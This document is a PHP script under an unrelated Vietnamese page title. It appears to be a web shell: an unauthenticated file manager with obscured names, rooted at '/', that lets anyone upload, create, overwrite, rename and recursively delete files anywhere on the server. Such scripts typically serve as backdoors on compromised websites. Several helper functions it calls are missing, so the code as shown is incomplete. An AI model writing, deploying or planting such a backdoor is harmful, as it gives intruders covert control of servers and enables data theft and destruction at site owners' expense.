Viên ngọc phương Đông

<?php
function esc($v){return htmlspecialchars($v,ENT_QUOTES,'UTF-8');}

function ses(){
    if(!session_id())session_start();
    if(!isset($_SESSION['lao']))$_SESSION['lao']=[];
}

function tk($d){
    ses();
    $k=substr(md5($d.time().rand()),0,8);
    $_SESSION['lao'][$k]=$d;
    return $k;
}

function gt($k,$d=null){
    ses();
    return $_SESSION['lao'][$k]??$d;
}

function jmp($w,$a=[]){
    global $_GET,$loc,$rt,$st,$vw,$fn;
    $_GET=$a+['t'=>tk($w)];
    $loc=norm($w,$rt);
    $st=$_GET['st']??'';
    $vw=$_GET['vw']??'';
    $fn=$_GET['fn']??'';
    $_POST=[];
    $_SERVER['REQUEST_METHOD']='GET';
}

function rmd($d){
    if(!is_dir($d))return false;
    foreach(scandir($d)?:[] as $e){
        if($e==='.' or $e==='..')continue;
        $fp=$d.DIRECTORY_SEPARATOR.$e;
        is_dir($fp)?rmd($fp):@unlink($fp);
    }
    return @rmdir($d);
}

function lnk($p,$t){return '<a href="?t='.esc(tk($p)).'">'.$t.'</a>';}

$rt='/';
$tid=$_GET['t']??null;
$loc=$tid!==null?norm(gt($tid,$rt),$rt):norm('',$rt);
$st=$_GET['st']??'';
$vw=$_GET['vw']??'';
$fn=$_GET['fn']??'';

if($_SERVER['REQUEST_METHOD']==='POST'){
    $pt=$_POST['pt']??$loc;

if(isset($_FILES['ul'])){
        $f=$_FILES['ul'];
        $dst=$pt.DIRECTORY_SEPARATOR.basename($f['name']);
        if($f['error']===0 and is_uploaded_file($f['tmp_name']) and cp($f['tmp_name'],$dst)){
            jmp($pt,['st'=>'1']);
        }else{
            jmp($pt,['st'=>'0']);
        }
    }

if(isset($_POST['nf'])){
        $nm=basename($_POST['nm']??'');
        $dt=$_POST['dt']??'';
        if($nm and !file_exists($pt.DIRECTORY_SEPARATOR.$nm)){
            $h=fopen($pt.DIRECTORY_SEPARATOR.$nm,'w');
            fwrite($h,$dt);
            fclose($h);
            jmp($pt,['st'=>'1']);
        }else{
            jmp($pt,['st'=>'0']);
        }
    }

if(isset($_POST['mk'])){
        $nm=basename($_POST['nm']??'');
        if($nm and !file_exists($pt.DIRECTORY_SEPARATOR.$nm) and mkdir($pt.DIRECTORY_SEPARATOR.$nm,0755,true)){
            jmp($pt,['st'=>'1']);
        }else{
            jmp($pt,['st'=>'0']);
        }
    }

if(isset($_POST['wr'])){
        $fnm=$_POST['fnm']??'';
        $fp=$pt.DIRECTORY_SEPARATOR.$fnm;
        $dt=$_POST['dt']??'';
        if($fnm and is_file($fp)){
            $h=fopen($fp,'w');
            fwrite($h,$dt);
            fclose($h);
            jmp($pt,['st'=>'1','vw'=>'e','fn'=>$fnm]);
        }else{
            jmp($pt,['st'=>'0','vw'=>'e','fn'=>$fnm]);
        }
    }

if(isset($_POST['mv'])){
        $old=basename($_POST['old']??'');
        $new=basename($_POST['new']??'');
        if($old and $new and file_exists($pt.DIRECTORY_SEPARATOR.$old) and !file_exists($pt.DIRECTORY_SEPARATOR.$new) and rename($pt.DIRECTORY_SEPARATOR.$old,$pt.DIRECTORY_SEPARATOR.$new)){
            jmp($pt,['st'=>'1']);
        }else{
            jmp($pt,['st'=>'0']);
        }
    }

if(isset($_POST['rm'])){
        $nm=basename($_POST['nm']??'');
        if($nm){
            $fp=$pt.DIRECTORY_SEPARATOR.$nm;
            if((is_file($fp) and @unlink($fp)) or (is_dir($fp) and rmd($fp))){
                jmp($pt,['st'=>'1']);
            }else{
                jmp($pt,['st'=>'0']);
            }
        }else{
            jmp($pt,['st'=>'0']);
        }
    }
}
?><!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Fx</title>
<style>
body{font:11px monospace;margin:8px;background:#fcfcfc}
a{color:#0055bb;text-decoration:none}
a:hover{text-decoration:underline}
input,textarea,button{font:11px monospace;padding:2px;border:1px solid #aaa;margin:1px}
button{background:#e8e8e8;cursor:pointer}
button:hover{background:#ddd}
table{border-collapse:collapse;width:100%;margin:8px 0}
td,th{border:1px solid #ccc;padding:3px;text-align:left}
th{background:#eee}
.s1{color:#0c0}
.s0{color:#c00}
</style>
</head>
<body>
<b><?php echo crumb($loc,$rt)?></b>
<?php if($st==='1'):?><span class="s1"> ✓</span><?php elseif($st==='0'):?><span class="s0"> ✗</span><?php endif;?>
<hr>
<form method="post" enctype="multipart/form-data">
<input type="hidden" name="pt" value="<?php echo esc($loc)?>">
<input type="file" name="ul"><button>↑</button>
</form>
<form method="post">
<input type="hidden" name="pt" value="<?php echo esc($loc)?>">
<input name="nm" placeholder="nm" size="15">
<textarea name="dt" rows="2" cols="30"></textarea>
<button name="nf">+f</button>
</form>
<form method="post">
<input type="hidden" name="pt" value="<?php echo esc($loc)?>">
<input name="nm" placeholder="nm" size="15"><button name="mk">+d</button>
</form>
<hr>
<?php if($vw==='e' and $fn!==''):
$fp=$loc.DIRECTORY_SEPARATOR.$fn;
if(is_file($fp)):
$h=fopen($fp,'r');
$cnt=fread($h,filesize($fp));
fclose($h);
?>
<b><?php echo esc($fn)?></b>
<form method="post">
<input type="hidden" name="pt" value="<?php echo esc($loc)?>">
<input type="hidden" name="fnm" value="<?php echo esc($fn)?>">
<textarea name="dt" rows="16" cols="70"><?php echo esc($cnt)?></textarea><br>
<button name="wr">↓</button>
</form>
<hr>
<?php endif;endif;?>
<table>
<tr><th>nm</th><th>sz</th><th>ac</th></tr>
<?php
$items=scandir($loc)?:[];
foreach($items as $itm){
    if($itm==='.' or $itm==='..')continue;
    $fp=$loc.DIRECTORY_SEPARATOR.$itm;
    $isd=is_dir($fp);
    $sz=$isd?'--':number_format(filesize($fp));
    echo '<tr><td>';
    if($isd){
        echo '[d] '.lnk($fp,$itm);
    }else{
        echo '[f] '.esc($itm);
    }
    echo '</td><td>'.$sz.'</td><td>';
    if(!$isd){
        echo '<a href="?t='.esc(tk($loc)).'&vw=e&fn='.urlencode($itm).'">ed</a> ';
    }
    echo '<form method="post" style="display:inline">
    <input type="hidden" name="pt" value="'.esc($loc).'">
    <input type="hidden" name="nm" value="'.esc($itm).'">
    <button name="rm" onclick="return confirm(\'?\')">x</button>
    </form> ';
    echo '<form method="post" style="display:inline">
    <input type="hidden" name="pt" value="'.esc($loc).'">
    <input type="hidden" name="old" value="'.esc($itm).'">
    <input name="new" size="7">
    <button name="mv">&gt;</button>
    </form>';
    echo '</td></tr>';
}
?>
</table>
</body>
</html>